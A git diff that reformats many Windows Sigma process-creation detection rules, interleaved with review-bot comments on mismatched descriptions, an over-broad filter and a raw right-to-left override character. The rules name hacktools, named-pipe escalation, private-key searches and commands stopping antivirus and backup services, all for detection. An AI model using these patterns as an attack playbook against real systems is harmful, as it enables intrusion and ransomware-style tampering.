diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml b/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml
index 0df0cd25a..0bcedb2cf 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml
@@ -1,8 +1,7 @@ title: Suspicious Process Parents id: cbec226f-63d9-4eca-9f52-dfb6652f24df status: test -description: Detects suspicious parent processes that should not have any children - or should only have a single possible child program +description: Detects suspicious parent processes that should not have any children or should only have a single possible child program references: - https://twitter.com/x86matthew/status/1505476263464607744?s=12 - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b
@@ -28,21 +27,21 @@ detection: ParentProcessName|endswith: - \csrss.exe - \certutil.exe + # - '\schtasks.exe' - \eventvwr.exe - \calc.exe - \notepad.exe filter_special: - NewProcessName|endswith: + NewProcessName|endswith: - \WerFault.exe - \wermgr.exe - - \conhost.exe - - \mmc.exe - - \win32calc.exe + - \conhost.exe # csrss.exe, certutil.exe + - \mmc.exe # eventvwr.exe + - \win32calc.exe # calc.exe - \notepad.exe filter_null: - NewProcessName: null - condition: process_creation and (selection or ( selection_special and not 1 of - filter_* )) + NewProcessName: + condition: process_creation and (selection or ( selection_special and not 1 of filter_* )) falsepositives: - Unknown level: high
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml b/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml
index 8879ad079..9e07c635e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml
@@ -1,11 +1,10 @@ title: Privilege Escalation via Named Pipe Impersonation id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b related: - - id: f35c5d71-b489-4e22-a115-f003df287317 - type: derived + - id: f35c5d71-b489-4e22-a115-f003df287317 + type: derived status: test -description: Detects a remote file copy attempt to a hidden network share. This may - indicate lateral movement or data staging activity. +description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. references: - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html author: Tim Rauch @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_name: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - echo - '>' - \\\\.\\pipe\\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml b/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml index d5178f5b6..11bc7eb01 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml 
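Review bot: The rewritten `+description:` line in the first hunk still says `Detects a remote file copy attempt to a hidden network share`, which does not match this rule's title (Privilege Escalation via Named Pipe Impersonation) or its detection logic in the second hunk (cmd.exe/powershell.exe with `echo`, `>` and `\\\\.\\pipe\\` in the command line); it appears to have been carried over from a different rule. Since the line is being rewritten anyway, suggest `description: Detects cmd.exe or powershell.exe echoing data into a named pipe (\\.\pipe\), a pattern associated with privilege escalation via named pipe impersonation.` The reflow itself only changed the wrapping, so the mismatch is pre-existing, but it is the line under review here.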
@@ -1,8 +1,7 @@ title: Private Keys Reconnaissance Via CommandLine Tools id: 213d6a77-3d55-4ce8-ba74-fcfef741974e status: test -description: Adversaries may search for private key certificate files on compromised - systems for insecurely stored credential +description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -19,24 +18,24 @@ detection: EventID: 4688 Channel: Security selection_cmd_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: 'dir ' + CommandLine|contains: 'dir ' selection_pwsh_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: 'Get-ChildItem ' + CommandLine|contains: 'Get-ChildItem ' selection_findstr: - - NewProcessName|endswith: \findstr.exe - - OriginalFileName: FINDSTR.EXE + - NewProcessName|endswith: \findstr.exe + - OriginalFileName: FINDSTR.EXE selection_ext: - CommandLine|contains: + CommandLine|contains: - .key - .pgp - .gpg @@ -47,8 +46,7 @@ detection: - .cer - .p7b - .asc - condition: process_creation and (selection_ext and (all of selection_cmd_* or - all of selection_pwsh_* or selection_findstr)) + condition: process_creation and (selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or selection_findstr)) falsepositives: - Unknown level: medium 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml index 687c43519..8ef130a66 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml @@ -1,8 +1,7 @@ title: Suspicious RunAs-Like Flag Combination id: 50d66fb0-03f8-4da0-8add-84e77d12a020 status: test -description: Detects suspicious command line flags that let the user set a target - user and command as e.g. seen in PsExec-like tools +description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools references: - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html author: Florian Roth (Nextron Systems) @@ -17,16 +16,16 @@ detection: EventID: 4688 Channel: Security selection_user: - CommandLine|contains: + CommandLine|contains: - ' -u system ' - ' --user system ' - ' -u NT' - ' -u "NT' - - ' -u ''NT' + - " -u 'NT" - ' --system ' - ' -u administrator ' selection_command: - CommandLine|contains: + CommandLine|contains: - ' -c cmd' - ' -c "cmd' - ' -c powershell' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml index 13b2175da..e2c4f5854 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \svchost.exe - \taskhost.exe - \lsm.exe 
@@ -32,20 +32,20 @@ detection: - \wininit.exe - \winlogon.exe filter_sys: - - ParentProcessName|endswith: - - \SavService.exe - - \ngen.exe - - ParentProcessName|contains: - - \System32\ - - \SysWOW64\ + - ParentProcessName|endswith: + - \SavService.exe + - \ngen.exe + - ParentProcessName|contains: + - \System32\ + - \SysWOW64\ filter_msmpeng: ParentProcessName|contains: - \Windows Defender\ - \Microsoft Security Client\ ParentProcessName|endswith: \MsMpEng.exe filter_null: - - ParentProcessName: null - - ParentProcessName: '-' + - ParentProcessName: + - ParentProcessName: '-' condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Some security products seem to spawn these diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml b/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml index 251e0c89a..f6eaefcde 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml @@ -1,8 +1,7 @@ title: Suspicious Program Names id: efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6 status: test -description: Detects suspicious patterns in program names or folders that are often - found in malicious samples or hacktools +description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: Florian Roth (Nextron Systems) 
@@ -19,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|contains: - - \CVE-202 - - \CVE202 - - NewProcessName|endswith: - - \poc.exe - - \artifact.exe - - \artifact64.exe - - \artifact_protected.exe - - \artifact32.exe - - \artifact32big.exe - - obfuscated.exe - - obfusc.exe - - \meterpreter + - NewProcessName|contains: + - \CVE-202 # Update this when we reach the year 2100 + - \CVE202 # Update this when we reach the year 2100 + - NewProcessName|endswith: + - \poc.exe + - \artifact.exe + - \artifact64.exe + - \artifact_protected.exe + - \artifact32.exe + - \artifact32big.exe + - obfuscated.exe + - obfusc.exe + - \meterpreter selection_commandline: - CommandLine|contains: + CommandLine|contains: - inject.ps1 - Invoke-CVE - pupy.ps1 diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml b/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml index 6aac456cc..9240f44fd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml @@ -1,11 +1,10 @@ title: Recon Information for Export with Command Prompt id: aa2efee7-34dd-446e-8a37-40790a66efd7 related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md author: frack113 
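Review bot: The new comments `# Update this when we reach the year 2100` on the `\CVE-202` and `\CVE202` entries in the first hunk overstate the coverage: a `contains` match on `\CVE-202` only matches identifiers CVE-2020 through CVE-2029 and stops matching at CVE-2030. Suggest `- \CVE-202 # Matches CVE-2020 to CVE-2029; revisit in 2030` (and the same wording for `\CVE202`), or widen the pattern to `\CVE-20` if the intent really is to cover the whole century.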
@@ -22,15 +21,15 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: - - \tree.com - - \WMIC.exe - - \doskey.exe - - \sc.exe - - OriginalFileName: - - wmic.exe - - DOSKEY.EXE - - sc.exe + - NewProcessName|endswith: + - \tree.com + - \WMIC.exe + - \doskey.exe + - \sc.exe + - OriginalFileName: + - wmic.exe + - DOSKEY.EXE + - sc.exe selection_redirect: ParentCommandLine|contains: - ' > %TEMP%\' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml b/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml index 973c89ec6..30867cd9b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml @@ -1,11 +1,10 @@ title: Suspicious Process Execution From Fake Recycle.Bin Folder id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0 related: - - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca - type: derived + - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca + type: derived status: experimental -description: Detects process execution from a fake recycle bin folder, often used - to avoid security solution. +description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. references: - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ @@ -23,7 +22,8 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: + # e.g. C:\$RECYCLER.BIN - RECYCLERS.BIN\ - RECYCLER.BIN\ condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml b/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml index 12b1fa942..1aceffb5d 100644 
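Review bot: The new comment `# e.g. C:\$RECYCLER.BIN` in the second hunk omits the trailing backslash that both `contains` values below it require (`RECYCLERS.BIN\`, `RECYCLER.BIN\`), so the example as written would not itself be matched by the selection. Suggest `# e.g. C:\$RECYCLER.BIN\<binary>.exe` so the example illustrates the pattern that is actually matched.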
--- a/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml @@ -1,8 +1,7 @@ title: Suspicious Redirection to Local Admin Share id: ab9e3b40-0c85-4ba1-aede-455d226fd124 status: test -description: Detects a suspicious output redirection to the local admins share, this - technique is often found in malicious scripts or hacktool stagers +description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers references: - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_redirect: - CommandLine|contains: '>' + CommandLine|contains: '>' selection_share: - CommandLine|contains: + CommandLine|contains: - \\\\127.0.0.1\\admin$\\ - \\\\localhost\\admin$\\ condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml b/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml index 21916a907..331d6dad5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml 
@@ -1,9 +1,7 @@ title: Potential Remote Desktop Tunneling id: 8a3038e8-9c9d-46f8-b184-66234a160f6f status: test -description: Detects potential use of an SSH utility to establish RDP over a reverse - SSH Tunnel. This can be used by attackers to enable routing of network packets - that would otherwise not reach their intended destination. +description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. references: - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html author: Tim Rauch @@ -19,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: :3389 + CommandLine|contains: :3389 # RDP port and usual SSH tunneling related switches in command line selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -L ' - ' -P ' - ' -R ' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml b/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml index 2313e0ad7..202ee9008 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml 
@@ -1,12 +1,9 @@ title: Potential Defense Evasion Via Right-to-Left Override id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 status: test -description: 'Detects the presence of the "u202+E" character, which causes a terminal, - browser, or operating system to render text in a right-to-left sequence. - +description: | + Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques. - - ' references: - https://redcanary.com/blog/right-to-left-override/ - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method @@ -24,10 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: "\u202E" + CommandLine|contains: ‮ condition: process_creation and selection falsepositives: - - Commandlines that contains scriptures such as arabic or hebrew might make use - of this character + - Commandlines that contains scriptures such as arabic or hebrew might make use of this character level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml index e091c779a..bfad4f82e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml 
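Review bot: The rewritten block-scalar description in the first hunk still names the character as `"u202+E"`, which is not a valid code point notation; the character the detection matches is U+202E RIGHT-TO-LEFT OVERRIDE. Suggest `Detects the presence of the U+202E (RIGHT-TO-LEFT OVERRIDE) character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.` The next line's `This is used as an obfuscation and masquerading techniques` could be corrected to `technique` while the block is being rewritten.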
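Review bot: The second hunk replaces the escaped `"\u202E"` with the raw, invisible RIGHT-TO-LEFT OVERRIDE character as an unquoted YAML scalar. A raw bidi control character cannot be checked by eye in a diff viewer or editor, can be silently stripped or normalised by copy/paste and text tooling, and is the class of character that "Trojan Source" bidi warnings in forges and compilers flag, so a reviewer can no longer confirm that the value is still U+202E. Keeping the explicit escaped form is self-documenting: `CommandLine|contains: "\u202E" # U+202E RIGHT-TO-LEFT OVERRIDE`. If the converter that produced this file insists on emitting the raw character, it should at least be quoted and carry that same code-point comment.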
@@ -1,8 +1,7 @@ title: Script Interpreter Execution From Suspicious Folder id: 1228c958-e64e-4e71-92ad-7d429f4138ba status: test -description: Detects a suspicious script execution in temporary folders or folders - accessible by environment variables +description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables references: - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military @@ -21,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_proc_image: - NewProcessName|endswith: + NewProcessName|endswith: - \cscript.exe - \mshta.exe - \wscript.exe selection_proc_flags: - CommandLine|contains: + CommandLine|contains: - ' -ep bypass ' - ' -ExecutionPolicy bypass ' - ' -w hidden ' @@ -39,7 +38,7 @@ detection: - mshta.exe - wscript.exe selection_folders_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - \AppData\Local\Temp @@ -47,15 +46,15 @@ detection: - \Temporary Internet - \Windows\Temp selection_folders_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ condition: process_creation and (1 of selection_proc_* and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml index 6912bd8a9..053384fd5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - \Windows\Temp - \Temporary Internet - \AppData\Local\Temp @@ -26,19 +26,19 @@ detection: - '%TEMP%' - '%TMP%' - '%LocalAppData%\Temp' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \mshta.exe - \wscript.exe - \cscript.exe filter: - CommandLine|contains: + CommandLine|contains: - ' >' - Out-File - ConvertTo-Json - - -WindowStyle hidden -Verb runAs - - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ + - -WindowStyle hidden -Verb runAs # VSCode behaviour if file cannot be written as current user + - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ # EC2 AWS condition: process_creation and (selection and not filter) falsepositives: - Administrative scripts diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml b/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml index e0f32afc7..c720babf5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml 
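Review bot: The new comment `# VSCode behaviour if file cannot be written as current user` in the second hunk documents why `-WindowStyle hidden -Verb runAs` sits in `filter`, but the filter is still a bare `CommandLine|contains`, so it exempts every powershell/pwsh/mshta/wscript/cscript launch from a temp folder whose command line carries a hidden-window elevation request, not only the editor's case. That flag pair is at least as typical of unwanted scripts as of VSCode, so the exemption would be safer narrowed to the VSCode case in a separate filter keyed on the parent process (this rule set already uses `ParentProcessName` and `ParentCommandLine` for such filters), leaving the generic `contains` list for the output-redirection entries. The `condition: process_creation and (selection and not filter)` line is inside the hunk and would need to become `not 1 of filter*` for an additional filter to take effect.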
@@ -1,11 +1,10 @@ title: Suspicious New Service Creation id: 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8 related: - - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab - type: derived + - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab + type: derived status: test -description: Detects creation of a new service via "sc" command or the powershell - "new-service" cmdlet with suspicious binary paths +description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -24,16 +23,17 @@ detection: EventID: 4688 Channel: Security selection_sc: - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath= - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName susp_binpath: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - mshta - wscript @@ -45,6 +45,7 @@ detection: - cmd.exe /k - cmd.exe /r - rundll32 + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml b/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml index 8e1fdeb85..7249e5ed2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - \Users\Public\ - \$Recycle.bin - \Users\All Users\ 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml index b4fff0e27..959017988 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml @@ -1,16 +1,14 @@ title: Suspicious Windows Service Tampering id: ce72ef99-22f1-43d4-8695-419dcb5d9330 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: derived - - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b - type: obsoletes - - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: derived + - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b + type: obsoletes + - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b + type: obsoletes status: experimental -description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in - order to stop, pause or delete critical or important Windows services such as - AV, Backup, etc. As seen being used in some ransomware scripts +description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts references: - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html 
@@ -31,35 +29,35 @@ detection: EventID: 4688 Channel: Security selection_net_img: - - OriginalFileName: - - net.exe - - net1.exe - - NewProcessName|endswith: - - \net.exe - - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe selection_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_sc_img: - - OriginalFileName: sc.exe - - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe selection_sc_cli: - CommandLine|contains: + CommandLine|contains: - ' stop ' - ' delete ' - ' pause ' selection_pwsh_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_services: - CommandLine|contains: + CommandLine|contains: - 143Svc - Acronis VSS Provider - AcronisAgent @@ -72,7 +70,7 @@ detection: - AVG Antivirus - avgAdminClient - AvgAdminServer - - AVP1 + - AVP1 # Covers multiple AVP versions - BackupExec - bedbg - BITS @@ -80,10 +78,10 @@ detection: - Client Agent 7.60 - Core Browsing Protection - Core Mail Protection - - Core Scanning Server + - Core Scanning Server # Covers 'Core Scanning ServerEx' - DCAgent - - EhttpSr - - ekrn + - EhttpSr # Covers 'EhttpSry', 'EhttpSrv' + - ekrn # Covers 'ekrnEpsw' - Enterprise Client Service - epag - EPIntegrationService @@ -98,7 +96,7 @@ detection: - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance - HealthTLService - - MSSQLFDLauncher$ + - MSSQLFDLauncher$ # Covers 'SHAREPOINT', 'TPS', 'SBSMonitoring', etc. - hmpalertsvc - HMS - IISAdmin 
@@ -239,11 +237,8 @@ detection: - wozyprobackup - WRSVC - Zoolz 2 Service - condition: process_creation and (selection_services and (all of selection_net_* - or all of selection_pwsh_* or all of selection_sc_*)) + condition: process_creation and (selection_services and (all of selection_net_* or all of selection_pwsh_* or all of selection_sc_*)) falsepositives: - - Administrators or tools shutting down the services due to upgrade or removal - purposes. If you experience some false positive, please consider adding filters - to the parent process launching this command and not removing the entry + - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml index 184bedba8..dd39b7577 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml @@ -1,8 +1,7 @@ title: Shadow Copies Creation Using Operating Systems Utilities id: b17ea6f7-6e90-447e-a799-e6c0a493d6ce status: test -description: Shadow Copies creation using operating systems utilities, possible credential - access +description: Shadow Copies creation using operating systems utilities, possible credential access references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/ 
@@ -22,18 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shadow - create condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml index dc68ddca3..a67d11c75 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml @@ -12,8 +12,7 @@ references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware -author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil - Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) +author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/10/22 modified: 2022/11/03 tags: 
